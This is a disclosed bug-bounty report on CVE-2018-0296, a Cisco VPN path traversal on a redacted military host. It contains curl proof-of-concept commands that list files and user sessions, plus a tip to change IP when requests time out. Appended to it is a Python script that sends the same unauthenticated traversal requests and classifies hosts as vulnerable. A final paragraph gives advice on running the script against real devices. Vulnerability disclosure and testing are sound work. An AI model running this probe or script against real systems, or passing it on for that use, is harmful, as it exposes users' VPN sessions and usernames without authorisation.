[CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (████.███.mil)

Disclosed: 2024-06-18 17:06:48 By sp1d3rs To deptofdefense
Medium
Vulnerability Details
## Description

I discovered a previously unidentified instance https://█████████ (████.██████.mil) in the █████████ network, vulnerable to CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296).

## POC

```
curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```

█████████

We can disclose user sessions by querying /sessions:

```
curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```

## Suggested fix

Updating to the latest version should fix the issue. The fixed version should give a 404 "File not found" error. Example of a patched version:

```
curl -i -k "https://█████████.██████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```

## Notes

In case you experience a request timeout when reproducing, try changing your IP/VPN.

## Impact

Path traversal, which can allow an unauthenticated attacker to disclose sensitive information such as VPN sessions, files, and usernames. Under some conditions it's possible to cause DoS attacks.
Report Stats
  • Report ID: 695429
  • State: Closed
  • Substate: resolved
  • Upvotes: 18
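The probe in the report hinges on one detail that is easy to lose when moving from curl to a script: the request-target must reach the device with `/+CSCOU+/../+CSCOE+/` intact, which is why `--path-as-is` is needed (curl otherwise collapses the dot segment client-side and the traversal never happens). The following helper is an added example, not part of the original report or a Cisco tool. It builds the two probe paths from the report, sends them with Python's `http.client` (which writes the request line verbatim and, with an unverified TLS context, mirrors `curl -k`), and classifies the answer using only the signal the report gives: a 404 "File not found" means patched, a 200 with a JSON listing means vulnerable, anything else (timeouts, WAF pages, redirects to the login portal) is inconclusive. The hostname is redacted in the report, so `TARGET` is a placeholder assumption, and the sample responses at the bottom are constructed for an offline run.

```python
"""Offline-testable reproduction helper for the CVE-2018-0296 probe.

Added example; not code from the report or from Cisco. The hostname is a
placeholder (the report redacts it) and SAMPLE_RESPONSES are constructed.
"""
import http.client
import json
import ssl

# Traversal path exactly as the report sends it. http.client does not
# normalise "/../" in the request line, so no --path-as-is equivalent is needed.
TRAVERSAL_PATH = "/+CSCOU+/../+CSCOE+/files/file_list.json"

# Placeholder target (assumption): the real host is redacted in the report.
TARGET = "vpn.example.invalid"


def build_probe_path(subpath=None):
    """Return the request-target for the probe.

    Without subpath this is the bare directory listing from the report;
    with subpath (e.g. "/sessions") it appends the ?path= parameter used to
    list user sessions.
    """
    if subpath is None:
        return TRAVERSAL_PATH
    return f"{TRAVERSAL_PATH}?path={subpath}"


def classify_response(status, body):
    """Classify a probe response as 'patched', 'vulnerable' or 'inconclusive'.

    The report states a patched device answers 404 "File not found", while a
    vulnerable one returns the file listing. A 200 that is not parseable JSON
    (login portal HTML, a WAF block page) proves nothing, so it is left as
    inconclusive rather than counted as a hit.
    """
    if status == 404:
        return "patched"
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "inconclusive"
        return "vulnerable" if data else "inconclusive"
    return "inconclusive"


def send_probe(host, subpath=None, timeout=10):
    """Send the probe over TLS without certificate verification (like curl -k).

    Returns (status, body, verdict). Not exercised offline.
    """
    ctx = ssl._create_unverified_context()
    conn = http.client.HTTPSConnection(host, 443, timeout=timeout, context=ctx)
    try:
        conn.request("GET", build_probe_path(subpath))
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        return resp.status, body, classify_response(resp.status, body)
    finally:
        conn.close()


# Constructed sample responses (not captured from any real device) so the
# classifier can be exercised without network access.
SAMPLE_RESPONSES = {
    "patched_device": (404, "File not found"),
    "vulnerable_listing": (200, '[{"name": "sessions"}, {"name": "logon"}]'),
    "login_portal": (200, "<html><body>SSL VPN Service</body></html>"),
    "waf_or_outage": (503, ""),
}


def classify_samples():
    """Run the classifier over the constructed samples; returns a dict of verdicts."""
    return {name: classify_response(s, b) for name, (s, b) in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name}: {verdict}")
    # Live probe against the placeholder target would be:
    # print(send_probe(TARGET, "/sessions"))
```

When running this against a real device, prefer the bare listing first and only then `?path=/sessions`; both are unauthenticated GETs, but the sessions listing is the one that exposes usernames, and the report notes that timeouts are common enough that a change of source IP may be needed before drawing a conclusion.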